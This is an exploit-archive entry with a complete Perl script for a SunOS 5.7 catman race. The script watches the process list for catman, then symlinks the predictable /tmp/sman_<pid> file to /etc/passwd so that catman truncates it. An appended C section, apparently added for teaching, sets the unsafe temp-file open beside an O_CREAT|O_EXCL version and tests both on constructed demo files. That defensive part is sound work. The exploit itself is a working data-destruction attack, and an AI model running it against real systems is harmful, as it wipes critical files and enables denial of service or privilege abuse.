# Title : SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit
# Published : 2000-12-20
# Author : lwc
#!/usr/local/bin/perl -w
#
# The problem is that catman creates files in /tmp
# insecurely. Their names are based on the PID of the
# catman process, and catman will happily clobber
# any file that is symlinked to that name.
# The idea of this script is to watch the
# process list for the catman process, get
# the PID and create a symlink in /tmp to our
# file to be clobbered. This exploit depends
# on system speed and process load. This
# worked on a patched Solaris 2.7 box (August
# 2000 patch cluster)
# SunOS rootabega 5.7 Generic_106541-12 sun4u
# sparc SUNW,Ultra-1 lwc@vapid.betteros.org
# 11/21/2000 Vapid Labs.
# http://vapid.betteros.org
use strict;

my $clobber = "/etc/passwd";    # file that catman will be tricked into truncating

while (1) {
    # Poll the process list; drop the grep processes and the ps header line.
    open(PS, "ps -ef | grep -v grep | grep -v PID |") or die "ps: $!";
    while (<PS>) {
        my @args = split " ", $_;    # column 1 of ps -ef output is the PID
        if (/catman/) {
            print "Symlinking sman_$args[1] to $clobber\n";
            symlink($clobber, "/tmp/sman_$args[1]");
            exit(1);
        }
    }
    close(PS);
}
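Added example, written for this page and not part of the original exploit or of Sun's catman source: the temp-file open pattern the header comment describes (predictable /tmp name, open follows whatever sits there) beside the O_CREAT|O_EXCL form that refuses a planted symlink, exercised as the regression check a maintainer would keep. The /tmp paths, the sman_demo_ naming and the sample file body are constructed for the demo.

```c
#define _POSIX_C_SOURCE 200809L   /* declares symlink, getpid, write, stat */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* catman's pattern: a predictable name, and O_TRUNC follows whatever is at that path. */
int open_tmp_unsafe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened: O_CREAT|O_EXCL fails with EEXIST if anything, a symlink included, already sits at
 * path, so a planted link is never followed. Pair it with an unpredictable name (mkstemp). */
int open_tmp_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Write a constructed sample body to path so a clobber is observable as size 0. */
static int write_victim(const char *path) {
    static const char body[] = "demo:x:1000:1000::/home/demo:/bin/sh\n";
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return -1;
    int ok = write(fd, body, sizeof body - 1) == (ssize_t)(sizeof body - 1);
    close(fd);
    return ok ? 0 : -1;
}
static long file_size(const char *p) { struct stat st; return stat(p, &st) == 0 ? (long)st.st_size : -1L; }
/* Regression check: plant a link at the predictable name and open it both ways.
 * Returns 0 when the unsafe open truncates the target and the safe open refuses. */
int run_demo(void) {
    char victim[64], link[64];
    snprintf(victim, sizeof victim, "/tmp/catman_demo_victim.%ld", (long)getpid());
    snprintf(link, sizeof link, "/tmp/sman_demo_%ld", (long)getpid()); /* stands in for /tmp/sman_<pid> */
    unlink(link);
    if (write_victim(victim) != 0 || symlink(victim, link) != 0) return -1;
    int fd = open_tmp_unsafe(link);          /* follows the link: victim shrinks to 0 bytes */
    if (fd >= 0) close(fd);
    long after_unsafe = file_size(victim);
    int rc = -1;
    if (write_victim(victim) == 0) {         /* restore, then try the hardened open */
        fd = open_tmp_safe(link);
        int refused = (fd < 0 && errno == EEXIST);
        if (fd >= 0) close(fd);
        if (after_unsafe == 0 && refused && file_size(victim) > 0) rc = 0;
    }
    unlink(link); unlink(victim);
    return rc;
}
```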